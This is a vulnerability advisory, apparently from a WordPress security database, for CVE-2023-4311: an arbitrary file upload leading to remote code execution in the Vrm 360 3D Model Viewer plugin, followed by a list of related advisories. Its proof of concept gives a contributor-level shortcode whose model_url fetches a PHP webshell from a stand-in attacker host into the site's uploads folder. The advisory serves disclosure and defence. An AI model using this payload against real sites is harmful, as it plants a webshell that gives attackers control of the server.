Vrm 360 3D Model Viewer <= 1.2.1 – Contributor+ Arbitrary File Upload Leading to RCE | CVE 2023-4311 | Plugin Vulnerabilities

Description

The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode.

Proof of Concept

1. Host a webserver with a shell named `webshell.zip.php`
2. As a contributor, add the shortcode: `[vrm360 canvas_name=s1 model_url=http://ATTACKER_HOST/webshell.zip.php aspect_ratio=1.8 initial_offset=0.9]`
3. Press "Preview" > "Preview in new tab"
4. See that the file has been uploaded to https://example.com/wp-content/uploads/tmp/webshell.zip.php

Affects Plugins

No known fix

References

CVE

YouTube Video

Classification

Type

RCE

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Jonatas Souza Villa Flor

Submitter

Jonatas Souza Villa Flor

Submitter website

https://decriptosec.com/

Submitter twitter

Verified

Yes

WPVDB ID

21950116-1a69-4848-9da0-e912096c0fce

Timeline

Publicly Published

2023-11-24 (about 5 months ago)

Added

2023-11-24 (about 5 months ago)

Last Updated

2023-11-24 (about 5 months ago)

Other

Published

Title

Published

2014-08-01

Title

Kernel Theme - functions/upload-h&ler.php File Upload Remote Code Execution

Published

2017-11-11

Title

WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)

Published

2024-03-13

Title

WP Fusion Lite < 3.42.10 - Authenticated (Contributor+) Remote Code Execution

Published

2021-05-09

Title

All in One SEO Pack < 4.1.0.2 - Admin RCE via unserialize

Published

2022-11-08

Title

Theme-Demo-Importer < 1.1.1 - Admin+ Arbitrary File Upload